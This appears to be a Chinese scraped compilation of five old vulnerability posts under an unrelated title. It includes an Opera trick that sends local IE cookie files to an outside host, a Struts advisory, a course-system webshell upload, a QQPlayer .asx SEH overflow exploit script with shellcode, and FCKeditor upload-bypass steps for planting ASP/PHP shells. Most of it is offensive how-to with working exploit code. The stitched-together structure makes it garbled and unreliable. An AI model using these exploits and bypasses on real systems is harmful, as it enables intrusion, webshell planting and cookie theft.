脚本本地/远程文件包含/读取及文件名截断漏洞FUZZ工具详解漏洞预警(精选5篇)
脚本本地/远程文件包含/读取及文件名截断漏洞FUZZ工具详解漏洞预警 篇1
by 空虚浪子心
这也可能是一个安全特性吧,opera可以使用ajax读取本地文件,
ff3没有这个漏洞。
不废话,看代码吧。
利用方式如下:
这段代码保存为本地htm文件,然后使用opera打开。
将会把本地用户名为administrator在alibaba的cookie,发送到www.inbreak.net/kxlzxtest/testxss/a.php
a.php代码:
a.php会按照IP+时间+cookie.txt 格式生成一个txt文件,
例如:121.0.29.2252009-01-05 11:55:02cookie.txt里面保存着administrator@alibaba[1].txt的内容。
几点说明:
1,cookie文件是IE的,比较XX,但是有很多人都会IE和opera混用。
2,必须预测本地用户名,不过很多人都是administrator。
3,必须预测cookie文件名。这个可以取一些常用网站的,反正ajax是异步,你可以同时调用几个方法。
4,或者你可以发送任何本地TXT文件。
opera可能说这是特性?不知道了,反正FF3没这个漏洞,使用这种方式会报错访问拒绝。
from:www.inbreak.net/?action=show&id=141
脚本本地/远程文件包含/读取及文件名截断漏洞FUZZ工具详解漏洞预警 篇2
受影响的软件及系统
Apache Struts 2.3.1及以下版本
漏洞描述
Apache Struts是一款开发Java Web应用程序的开源Web应用框架,
Apache Struts在实现上存在远程命令执行和任意文件覆盖漏洞,成功利用后会允许攻击者覆盖受影响计算机上的任意文件并以当前用户权限执行任意命令。
漏洞检测方法
检查Apache Struts的版本,若 <=2.3.1,则受该漏洞影响,
漏洞证明:
POC:www.1337day.com/exploits/17347
建议修补方案
对于Apache Struts<=2.3.1版本请升级至2.3.1.1或以上版本;请勿在开发模式运行应用程序。
参考文档:
struts.apache.org/2.x/docs/s2-008.html
天空课堂文件上传漏洞漏洞预警 篇3
允许上传危险文件类型,这个系统用的还是不少的
打开网络课网站,如图,登陆进去,现在网盘里传一个PHP文件,网盘竟然没过滤PHP文件,
进入后选择使用网盘文件,然后选择php文件,在切换到HTML下,就可以看到这个PHP文件在服务器上路径了,xxx.xxx.cn/SCR2006/Course … 31/111026085064.php,执行的时候好像不能写php大马,写个asp上去就可以了,
这个系统数据库用户用的是sa,有点。。
脚本本地/远程文件包含/读取及文件名截断漏洞FUZZ工具详解漏洞预警 篇4
#
# Title: QQPlayer asx File Processing Buffer Overflow Exploit
# Author: Li Qingshan of Information Security Engineering Center,School of Software and Microelectronics,Peking University
# Vendor: www.qq.com
# Platform. Windows XPSP3 Chinese Simplified
# Test: QQPlayer 2.3.696.400
# Vulnerable: QQPlayer<=2.3.696.400p1
#
#################################################################
# Code :
head ='''
junk = “A” * 1975
nseh =“x42x61x21x61”
seh=“xa9x9ex41x00”
adjust=“x30x83xc0x0c”
shellcode=(“PYIIIIIIIIIIQZVTX30VX4AP0A3HH0A00ABAABTAAQ2AB2BB0BBXP8ACJJIKLM8LI5PUPUPSPMYZEV”
“QN2BDLKPRVPLKQB4LLK0RR4LKSBWX4ONW1ZWVFQKO6QO0NLWL3QSLS26L7PIQ8ODM5QIWKRZPPRQGL”
“KQB4PLKPB7L5QXPLKQP2XK5IP44QZ5QXPPPLKQX4XLKQHGPUQN3KSGLQYLKP4LKUQ9FFQKOVQO0NL9”
“QXODM5QYWFXKPD5JT4C3MZXWK3MWTT5KRPXLKQHWTEQ8SCVLKTLPKLKQH5LEQN3LKS4LKC1XPMY1TW”
“TGT1KQKSQ0YPZ0QKOKP0XQOQJLKTRJKMVQMCZUQLMLEOIUPUPC0PPRHP1LKROLGKON5OKZPNUORF6R”
“HOVLUOMMMKOIE7LC6SLUZMPKKM0BU5UOKQWB32R2ORJ5PPSKOHUE3512LSS6N3U2X3UUPDJA”)
junk_=“R”*8000
foot ='''_playlis.wma“/>
'''
payload=head+junk+nseh+seh+adjust+shellcode+junk_+foot
fobj = open(”poc.asx“,”w")
fobj.write(payload)
脚本本地/远程文件包含/读取及文件名截断漏洞FUZZ工具详解漏洞预警 篇5
FCKeditor 文件上传“.”变“_”下划线的绕过方法:
这是网上公布的:
很多时候上传的文件例如:shell.php.rar 或 shell.php;.jpg 会变为 shell_php;.jpg 这是新版 FCK 的变化,试试上传 1.asp;jpg
提交 shell.php+空格 绕过,不过空格只支持 win 系统 *nix 是不支持的,shell.php 和 shell.php+空格 是 2 个不同的文件,未测试,
继续上传同名文件可变为 shell.php;(1).jpg,也可以新建一个文件夹,只检测了第一级的目录,如果跳到二级目录就不受限制,
突破建立文件夹:
editor/FCKeditor/editor/filemanager/connectors/asp/connector.asp?Command=CreateFolder&Type=Image&CurrentFolder=/qing.asp&NewFolderName=x.asp
参数:
当前目录名:CurrentFolder=/qing.asp
新的目录名:NewFolderName=x.asp
其实很简单,在目录那里写 x.asp,然后点击新建目录在弹出来的对话框中随便写……
那么 x.asp 就已经建立生成了,此方法百试百灵!
新建文件夹参数 x.asp,基本都能搞定。
【脚本本地/远程文件包含/读取及文件名截断漏洞FUZZ工具详解漏洞预警】推荐阅读:
小榕的WIS漏洞补充篇及利用篇脚本安全05-18
小米2A怎么打开本地mobi文件?07-06
linux下Shell中调用/引用/包含脚本文件方法linux操作系统08-27
本地特色与远程教育09-17
本地节目07-01
本地网络07-25
本地市场08-12
本地资源08-26
本地应用09-02
电信本地09-15